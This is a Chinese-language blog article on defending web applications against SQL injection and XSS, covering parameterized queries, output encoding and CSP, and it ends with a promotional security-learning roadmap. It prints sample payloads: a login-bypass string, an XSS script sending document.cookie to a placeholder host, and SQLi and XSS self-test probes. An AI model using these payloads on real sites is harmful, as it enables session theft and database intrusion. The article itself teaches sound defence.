尧图建网站 尧图建网站 YAOTU WEB BUILD 免费咨询
ARTICLE DETAIL

资讯详情

深耕网站建设与建站编程的一线实战洞察。

Web 业务防护:如何防御 SQL 注入与 XSS 攻击

Web 业务防护:如何防御 SQL 注入与 XSS 攻击 Web 业务防护如何防御 SQL 注入与 XSS 攻击前言SQL 注入与 XSS 跨站脚本是 OWASP Top10 常年稳居前列的经典 Web 漏洞也是渗透测试中最容易挖到的高危漏洞。很多开发以为简单过滤关键字就能防护结果被各种编码、变形、注释绕过造成数据库泄露、Cookie 窃取、账户劫持、后台沦陷等严重后果。SQL 注入核心危害读取、篡改数据库数据拿到服务器权限XSS 核心危害劫持用户会话、钓鱼、窃取账号、在用户浏览器执行恶意代码。二者攻击入口大多来自用户可控输入URL 参数、表单、接口 JSON、评论、HTTP 请求头。本文结合开发编码规范、安全加固、WAF、纵深防御讲解 SQL 注入、XSS 原理、攻击场景、正确防御手段同时指出开发最容易踩的坑适合后端开发、安全测试、运维阅读。免责声明本文仅用于 Web 安全学习、授权环境漏洞测试。严禁在未授权网站上进行注入、XSS 测试未经授权的安全测试违反《网络安全法》需要承担法律责任。一、SQL 注入原理与实战防御1.1 什么是 SQL 注入当后端直接把用户输入拼接到 SQL 语句中攻击者输入 SQL 语法字符篡改原有 SQL 逻辑让数据库执行非预期 SQL 指令。经典登录绕过 Payload用户名 OR 11 --后端不安全拼接后 SQL 变成select * from user where username OR 11 -- and passwordxxx--代表 SQL 注释直接绕过密码校验成功登录。核心本质用户输入被数据库解析成 SQL 代码而不是单纯的数据。1.2 正确防御方案优先级从高到低✅ 方案 1使用预编译参数化查询根治方案首选原理SQL 语句模板提前发给数据库完成语法编译用户输入仅作为参数绑定参数永远不会被数据库解析为 SQL 语法无论输入任何特殊字符、关键字只会当成普通字符串处理。Java 示例String sql SELECT * FROM user WHERE username ? AND password ?; PreparedStatement pstmt conn.prepareStatement(sql); pstmt.setString(1, username); pstmt.setString(2, password);MyBatis 注意坑#{}预编译占位符安全${}直接字符串拼接极易产生注入只有动态表名、排序字段才不得已使用并且要做严格白名单校验。PHP PDO 安全写法$stmt $pdo-prepare(select * from user where username?); $stmt-execute([$username]);Node.js 示例const sql SELECT * FROM user WHERE username ?; connection.query(sql, [username], function(err, result){})✅ 方案 2优先使用 ORM 框架减少手写 SQLMyBatis-Plus、Hibernate、Sequelize、GORM 等 ORM 框架默认使用参数化查询大幅减少手动拼接 SQL 带来的注入风险。⚠️重要提醒ORM 不等于绝对安全如果自己拼接原生 SQL 字符串依然会出现注入漏洞。✅ 方案 3输入白名单校验不是黑名单过滤白名单只允许符合预期格式的数据。例如手机号只能数字用户名只能字母数字下划线限制长度。// 用户名正则只允许字母、数字、下划线长度4~20 ^[a-zA-Z0-9_]{4,20}$❌黑名单不可靠过滤union、select、这类关键字攻击者可以大小写变形、注释拆分、编码绕过。黑名单只能作为辅助不能作为主防御手段。✅ 方案 4数据库账号最小权限原则业务连接数据库账号禁止使用 root、sa、sys 超级管理员账号。普通查询账号只允许 select提交业务账号仅拥有业务表 insert/update禁止 drop、alter、exec 等高危权限就算发生注入也能缩小攻击面防止拖库、删库。✅ 方案 5其他辅助加固关闭数据库错误详细信息不要直接把 SQL 报错返回前端防止攻击者通过报错获取表名、字段限制数据库连接 IP业务库不对外网开放WAF 添加注入规则作为最后一层防护。1.3 SQL 注入常见踩坑❌坑 1使用黑名单过滤单引号攻击者用宽字符注入、编码绕过❌坑 2使用 PDO 但开启模拟预编译PHP 老版本模拟预编译不防注入❌坑 3使用 ORM但是直接拼接字符串写原生 SQL❌坑 4认为前端做校验就安全前端校验可以被抓包修改后端校验必不可少。二、XSS 跨站脚本原理与防御2.1 XSS 三种类型存储型 XSS高危恶意脚本存入数据库评论、留言、公告其他用户访问页面时自动加载执行。持久化攻击危害最大可批量窃取大量用户 Cookie。Payload 示例scriptstealCookiedocument.cookie;location.hrefhttp://xxx.com/steal?cstealCookie/script反射型 XSS恶意代码放在 URL 参数后端拿到参数直接返回页面不会存入数据库。需要诱导用户点击特制链接才能触发搜索框、错误页面最常见。DOM 型 XSS****服务端无漏洞完全前端漏洞。JS 直接读取 URL、DOM 数据拼接进页面不需要后端参与。document.write、innerHTML、eval、location.href 等函数是高危点。XSS 本质用户可控数据输出到 HTML 页面被浏览器解析成 JS 代码执行。2.2 XSS 核心防御方案✅ 方案 1输出上下文编码最核心手段不要简单统一替换、编码方式由输出位置决定不同上下文需要不同转义规则HTML 正文区域HTML 实体编码 转义HTML 属性值属性编码JS 代码块内部JS 转义CSS 内CSS 编码URL 参数URL 编码。基础 HTML 实体转义函数示例function htmlEncode(str){ return str.replace(//g,amp;) .replace(//g,lt;) .replace(//g,gt;) .replace(//g,quot;) .replace(//g,#x27;); }现代前端框架 React、Vue 默认对插值内容自动做 HTML 转义但是v-html、dangerouslySetInnerHTML会关闭转义极易引入 XSS 漏洞。✅ 方案 2输入校验白名单优先对用户提交内容做限制比如评论如果不允许 HTML 标签直接过滤标签如果富文本业务编辑器不要手动写正则过滤标签使用成熟富文本过滤库DOMPurify。手写 HTML 标签黑名单过滤几乎一定会被绕过。✅ 方案 3CSP 内容安全策略纵深防御强烈推荐CSP 是 HTTP 响应头相当于浏览器白名单指定允许加载 JS、图片、脚本来源。即使页面存在 XSS 漏洞非白名单的脚本也无法执行是非常优秀的兜底防护。示例响应头Content-Security-Policy: default-src self; script-src self; img-src self data:; object-src none; base-uri self;配置注意事项尽量不要开启unsafe-inline、unsafe-eval开启后 CSP 防护效果大幅下降上线先用Content-Security-Policy-Report-Only模式只记录不拦截避免误伤业务配合 nonce 或者 hash安全的引入内联脚本。✅ 方案 4Cookie 安全属性减少 XSS 危害设置 CookieHttpOnly;Secure;SameSiteStrictHttpOnlyJS 无法读取 Cookie就算 XSS 成功也拿不到会话 CookieSecure仅 HTTPS 下传输 CookieSameSite防御 CSRF同时降低部分 XSS 劫持风险。HttpOnly 不能阻止 XSS 脚本执行只是保护 Cookie不能单独作为 XSS 防御手段。✅ 方案 5WAF 辅助防护WAF 识别script、javascript:、事件标签等 XSS 特征拦截恶意请求属于外层防护不能替代代码层修复。2.3 XSS 高频踩坑清单❌坑 1只在输入时过滤存入数据库输出不编码二次存储型 XSS❌坑 2统一 HTML 转义后直接放到 JS 代码块上下文不匹配依旧可以绕过❌坑 3Vue/React 使用 v-html、dangerouslySetInnerHTML 渲染用户输入❌坑 4富文本编辑器只简单过滤 script 标签忽略 onclick、onerror、javascript 伪协议❌坑 5DOM-XSS 只在后端做防护前端 JS 直接操作 DOM后端无法管控。三、SQL 注入与 XSS 防御对比表表格漏洞根本成因首选防御辅助加固常见坑SQL 注入用户输入拼入 SQL 语句被数据库解析参数化预编译查询最小数据库权限、关闭详细报错、WAF使用 ${} 字符串拼接、黑名单过滤XSS 跨站脚本用户数据输出到页面被浏览器解析 JS输出上下文编码CSP、Cookie HttpOnly、DOMPurify 富文本过滤v-html、innerHTML、只做输入过滤不做输出编码四、完整纵深防御体系开发 网关 测试1. 开发阶段根源防护最重要所有用户输入参数、表单、JSON、Header默认不可信SQL 全部使用预编译禁止直接拼接 SQL 字符串数据输出到页面根据上下文做对应编码富文本使用成熟净化库代码安全审计扫描工具检查 SQL 拼接、危险 DOM 函数2. 网关 / 中间件层WAF 部署拦截注入、XSS 攻击 Payload关闭 Web 详细错误页面不泄露代码、数据库信息配置 CSP、X-XSS-Protection 安全响应头3. 测试上线阶段上线前安全扫描使用 AWVS、Xray 扫描注入、XSS 漏洞人工渗透测试尝试各种变形 Payload 绕过过滤安全评审高危漏洞必须修复才能上线4. 运维监控WAF 日志审计持续监控注入、XSS 攻击请求告警高频攻击 IP拉黑恶意 IP五、漏洞快速自测 Payload授权环境测试使用SQL 注入简易测试 and 11 -- and 12 -- union select 1,version() --XSS 简易测试scriptalert(1)/script img srcx onerroralert(1) javascript:alert(1)注意仅可用于自己拥有授权的业务站点外部网站未经授权严禁测试。六、总结SQL 注入的核心思路分离 SQL 结构和用户数据使用预编译禁止字符串拼接 SQLXSS 的核心思路输入校验输出编码CSP 兜底区分渲染上下文。很多开发会误以为 WAF 可以解决一切问题WAF 只是外层防护很容易被编码、变形、请求拆分绕过漏洞的根治一定是在代码层面修复。二者都是经典漏洞但直到现在依然在大量业务系统中频繁出现根源就是开发不理解漏洞原理依赖简单黑名单过滤。一句话记住防注入不用字符串拼接 SQL防 XSS输出时按上下文编码CSP 做兜底所有用户输入永远不可信。最后网络安全需要学习那些知识网络安全零基础入门学习路线规划初级1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗想要入坑黑客网络安全的朋友给大家准备了一份282G全网最全的网络安全资料包免费领取7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime ·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完 ·用Python编写漏洞的exp,然后写一个简单的网络爬虫 ·PHP基本语法学习并书写一个简单的博客系统 熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选) ·了解Bootstrap的布局或者CSS。8、超级黑客这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。网络安全工程师企业级学习路线视频配套资料国内外网安书籍、文档工具当然除了有配套的视频同时也为大家整理了各种文档和书籍资料工具并且已经帮大家分好类了。一些我自己买的、其他平台白嫖不到的视频教程要学习网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】
返回列表